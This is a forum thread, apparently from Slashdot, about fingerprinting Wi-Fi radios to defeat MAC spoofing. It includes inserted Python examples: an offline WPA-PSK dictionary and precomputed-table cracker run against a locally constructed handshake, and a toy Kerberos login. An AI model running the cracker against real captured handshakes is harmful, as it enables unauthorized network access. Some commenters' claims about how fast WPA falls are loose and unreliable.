Wi-Fi Fingerprints -- the End of MAC Spoofing?
judgecorp writes, "Wireless devices can be identified by variations in their radio signaling, known as their 'transceiverprint,' according to research reported in Techworld. The Canadian researcher, Jeyanthi Hall, related the prints to MAC addresses and got a positive ID for devices connecting to a Wi-Fi network, claiming 95% success with no false positives. Once they work out how to do this without a dedicated signal analyzer and neural network processing, it's the end of MAC spoofing on wireless networks."
This has been in the HAM community for years.
http://www.motron.com/TransmitterID.html
If you RTFA, you would have seen that manufacturing variations yield differences even among the exact make and model -- e.g. that minor circuitry, amplifier and antenna variations yield a unique signature.
This is why you use WPA enterprise and not PSK.
Finkployd
There are variations in radios even among the same model. You can uniquely identify 2 separate radios of the same model pretty easily. This is something we have done to combat the squirrels (slang for the idiots who think it's fun to screw a ham repeater up) on our ham repeaters in our area... that, and triangulation of the perp's signal. Nothing new and about time.
Gorkman
Cuz you likely can't. To do so would require a microscope on a lot of WiFi cards, and even then you likely won't come close enough. The fingerprint is possible because of minor variations in the signal that are caused by variations in the caps and resistors used. You don't really think they can create a 0% tolerance cap, do you? The tolerances on caps and resistors can be 0.05%... that is still not 0%. A 0% tolerance cap or resistor is not possible. Spoofing an RF fingerprint is practically impossible with today's technology.
Gorkman
Most people can hack WPA in less than 20 minutes nowadays if you are able to force a machine on the network to send out a lot of packets (not difficult to do either). Very easy to spoof a MAC address on a WPA encrypted network.
WPA-PSK can be cracked in a short time too. If you use RADIUS it's a lot harder (which may be what you're thinking), but with PSK you are just a step harder to crack than WEP, not more secure.
Of Code And Men
Stuff I saw at DEFCON 14
multi-FPGA array + 4 million passwords + 2000 SSIDs + 2 days? = 40GB rainbow table = fast WPA cracking. USE FULL STRENGTH PASSWORDS!
There are two types of people in the world: those who divide people into two types and those who don't.
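The two posts above describe the mechanics without showing them, so here is an added example (my code, not anything posted in this thread or published by the DEFCON speaker) of why WPA-PSK cracking is an offline exercise and why that rainbow table is sized in SSIDs. The PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, so a precomputed table only pays off against networks that use one of the SSIDs it was built for; everything else needed to check a candidate (MACs, nonces, the EAPOL frame) is in the captured 4-way handshake. All MACs, nonces, the EAPOL frame and the wordlist below are constructed for the demonstration, and the handshake is generated locally rather than captured.

```python
"""Added example, not from the thread: offline WPA-PSK cracking against a constructed
4-way handshake, with the PMK precomputation keyed by SSID. No real capture is used."""
import hashlib
import hmac
from typing import Dict, Optional


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # The SSID is the salt, so a precomputed table is only valid for that exact SSID.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes.
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # The PTK depends on the PMK plus values that are all visible in the captured handshake.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2/CCMP key MIC: HMAC-SHA1 truncated to 128 bits over the EAPOL-Key frame with MIC zeroed.
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_table(ssids, wordlist) -> Dict[str, Dict[bytes, str]]:
    # The expensive step (4096 SHA1 rounds per guess) is done once per (SSID, passphrase).
    return {ssid: {wpa_pmk(pw, ssid): pw for pw in wordlist} for ssid in ssids}


# Constructed stand-ins for fields a cracker would read out of a captured handshake.
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Constructed EAPOL-Key message 2 (version 1, type 3, length 95) with the MIC field zeroed.
EAPOL_M2 = bytes.fromhex("0103005f02010a00") + b"\x00" * 87


def make_handshake(ssid: str, passphrase: str) -> dict:
    # Generates locally what a real client and AP would put on the air; the MIC is the only
    # value that depends on the passphrase, which is exactly what the cracker tests against.
    ptk = wpa_ptk(wpa_pmk(passphrase, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"ssid": ssid, "ap_mac": AP_MAC, "sta_mac": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": EAPOL_M2, "mic": eapol_mic(ptk[:16], EAPOL_M2)}


def crack(hs: dict, table: Dict[str, Dict[bytes, str]]) -> Optional[str]:
    candidates = table.get(hs["ssid"])
    if candidates is None:
        return None  # table was built for other SSIDs: the precomputation is useless here
    for pmk, passphrase in candidates.items():
        ptk = wpa_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"]):
            return passphrase
    return None


def demo() -> dict:
    # Constructed wordlist and SSID list; a real table would hold millions of each.
    table = build_table(["linksys", "default"], ["letmein", "password", "12345678"])
    return {
        "weak_common_ssid": crack(make_handshake("linksys", "password"), table),      # found
        "unknown_ssid": crack(make_handshake("MyHome", "password"), table),           # table miss
        "strong_passphrase": crack(make_handshake("linksys", "Qv8!mzL2#rTp0wXs"), table),  # not in list
    }


if __name__ == "__main__":
    print(demo())
```

The lookup against a table miss costs nothing, but a network whose SSID is not in the table falls back to doing the PBKDF2 work per guess, which is where the FPGA array comes in; a passphrase outside any wordlist defeats both, and a non-default SSID pushes the attacker off the precomputed path. `wpa_pmk("password", "IEEE")` reproduces the PMK test vector from the 802.11i spec, which is a useful sanity check for any reimplementation.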
These are cookie cutter devices. Their deltas are uber-thin. You'd need to resolve various characteristics to the femto-side of things. I'm sure that there's a lot of demand for high-resolution characterization gear out there that will slice things into ultra-tiny pieces, then have the ability to keep them in a useful db, then use that db to effectively serve as the gate of admittance control.
I don't think so.
Instead, a few little twigs will be used, and those twigs will define what's going on. Call it engineer SLOTH. Tolerances will be widened so that customer support problems don't occur. Once the routines are discovered (and it won't take long), then they'll be abused.... oops I mean cracked. The software that initially characterizes will need to be plenty smart to be able to prevent the same aforementioned customer service problems, and so it'll have slop, too. Add the slops together, and there's a hole. The 95% citation seems more like a salesperson's view of things. I'm far more skeptical. Look at how APs have evolved, as well as the chipsets for WiFoo (and read the book by the same name).
Go to Taiwan Inc and take a spectrum analyzer with you. I have. Throw in a high-rate sampling scope and look at the waveforms. Now add in some heat. User positioning. Skew it with some general and contentious noise to slop it up. Tell me you can get that kind of accuracy, then tell me that I can't take a similar chipset card and foo it up to make it fool some bozo pseudo-NSA sampler. Bah.
---- Teach Peace. It's Cheaper Than War.
In principle, yes this is possible, but not in practice. The error modulations color the smallest unit of modulation - the pulse. To "hide" the fingerprint, we would need to have a modulation capability at least one (and probably more) order of magnitude faster than what is being used to generate the pulse. While there likely are DSP chips fast enough to do this - the one on your wireless card can't. In practical terms, why would your card be engineered to have greater modulation capability than the technology requires for communication? That wouldn't be very efficient. And, oh by the way, any faster modulation capability used to inject "noise" while approximating the pulse would also be composed of pulses (albeit smaller ones). These pulses would themselves be subject to exactly the same type of fingerprinting due to the same random fabrication errors.
"It takes considerable knowledge just to realize the extent of your own ignorance." - Thomas Sowell
I mostly have an idea of what Radius is. But not entirely. I didn't even know there was something called FreeRadius. So what solution is Radius for and where does it fit into the universe of LDAP / Kerberos / Active Directory / etc?
:)
now THAT's a deep question, but one I am happy to answer because I love this stuff
Basically, enterprise WPA (802.1X) needs a source to authenticate from. The protocol most used (only used?) is RADIUS, an older protocol, not all that perfect, but until Diameter comes out (yes, the follow-on to RADIUS is called Diameter) it is about all we've got.
The central authentication system where I work is MIT Kerberos V (Active Directory also uses Kerberos V for authentication). This is ultimately where all userids and passwords are stored. The beauty of Kerberos is that one can authenticate to it and obtain a portable credential without ever sending the password over the wire (encrypted or not).
LDAP is where we store user profiles. Groups, attributes, etc. We do not authenticate to LDAP (although most places do, it seems) simply because Kerberos is much better, more secure, and unlike LDAP, actually designed to do authentication, not a hacked-on afterthought. You CAN authenticate to LDAP, but it involves passing your userid and password (hopefully over SSL) to the LDAP server. Some argue this is better and easier, but I maintain that anything relying on PKI is more complicated than necessary (and you are not really doing PKI unless you have a robust certificate revocation system, which nobody does).
Not to mention that Kerberos allows for a single sign-on environment, and many network services accept Kerberos credentials to log on (SSH, IMAP, NFS, AFS, etc.).
Finkployd
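The claim in the post above that Kerberos hands you a portable credential without the password ever crossing the wire is the part people find hardest to picture, so here is an added example (my own toy model, not MIT Kerberos code and not the setup at the poster's site) of the AS exchange that does it. The client and the KDC each derive the client's long-term key from the password and a salt; the KDC database holds only that key; the client proves possession of it by encrypting a timestamp (pre-authentication), and the KDC replies with a session key and a ticket sealed under the same key. The "encryption" here is an HMAC-SHA256 keystream plus MAC standing in for real Kerberos encryption types, and the realm, principal, password and lifetimes are all constructed values.

```python
"""Added example, not from the thread: a toy Kerberos AS-REQ/AS-REP exchange showing that
only a key derived from the password exists at the KDC and only ciphertext crosses the wire.
Toy cipher (HMAC-SHA256 keystream + MAC), not a real Kerberos encryption type."""
import hashlib
import hmac
import json
import os
import time


def string_to_key(password: str, realm: str, principal: str) -> bytes:
    # Kerberos derives the long-term key from the password with the realm+principal as salt.
    # Real etypes use their own KDFs (PBKDF2 for AES); the iteration count here is arbitrary.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), (realm + principal).encode(), 10000, 32)


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:n]


def seal(key: bytes, plaintext: bytes) -> bytes:
    # Toy authenticated encryption: nonce || (plaintext XOR keystream) || MAC.
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("integrity check failed (wrong key or tampered message)")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


class KDC:
    def __init__(self, realm: str):
        self.realm = realm
        self.db = {}                   # principal -> long-term key; the password is never stored
        self.tgs_key = os.urandom(32)  # krbtgt key that seals ticket-granting tickets

    def add_principal(self, principal: str, password: str) -> None:
        self.db[principal] = string_to_key(password, self.realm, principal)

    def as_exchange(self, principal: str, preauth: bytes) -> bytes:
        # PA-ENC-TIMESTAMP: the client proves it holds the key by decrypting/encrypting, not by
        # sending anything derivable offline from a single message without the key.
        k_c = self.db[principal]
        ts = int(unseal(k_c, preauth).decode())          # raises ValueError on a wrong password
        if abs(time.time() - ts) > 300:
            raise ValueError("clock skew too great")
        session_key = os.urandom(32)
        tgt = seal(self.tgs_key, json.dumps({"cname": principal, "key": session_key.hex(),
                                             "exp": ts + 10 * 3600}).encode())
        # AS-REP: session key and the (opaque to the client) TGT, sealed under the client's key.
        return seal(k_c, json.dumps({"key": session_key.hex(), "tgt": tgt.hex()}).encode())


def client_login(kdc: KDC, principal: str, password: str):
    """Returns (session_key, tgt, wire_messages). The password is used locally only."""
    k_c = string_to_key(password, kdc.realm, principal)
    preauth = seal(k_c, str(int(time.time())).encode())
    wire = [principal.encode(), preauth]                  # AS-REQ contents on the wire
    reply = kdc.as_exchange(principal, preauth)
    wire.append(reply)                                    # AS-REP contents on the wire
    creds = json.loads(unseal(k_c, reply))                # wrong password: MAC fails here too
    return bytes.fromhex(creds["key"]), bytes.fromhex(creds["tgt"]), wire


def tgs_open_ticket(kdc: KDC, tgt: bytes) -> dict:
    # What the ticket-granting service sees when the client later presents the TGT.
    return json.loads(unseal(kdc.tgs_key, tgt))


if __name__ == "__main__":
    kdc = KDC("EXAMPLE.ORG")                              # constructed realm and principal
    kdc.add_principal("alice", "correct horse battery staple")
    key, tgt, wire = client_login(kdc, "alice", "correct horse battery staple")
    print("TGS view of ticket:", tgs_open_ticket(kdc, tgt)["cname"])
    print("password on wire:", any(b"correct horse" in m for m in wire))
```

The thing to notice is what an eavesdropper gets: a principal name and two sealed blobs. Contrast that with the LDAP simple bind the post describes, where the password itself is in the request and the only protection is the TLS channel around it. The pre-auth timestamp is also why Kerberos deployments care about clock skew, and why the encrypted timestamp (not the password) is what an offline guesser would attack if the long-term key came from a weak password.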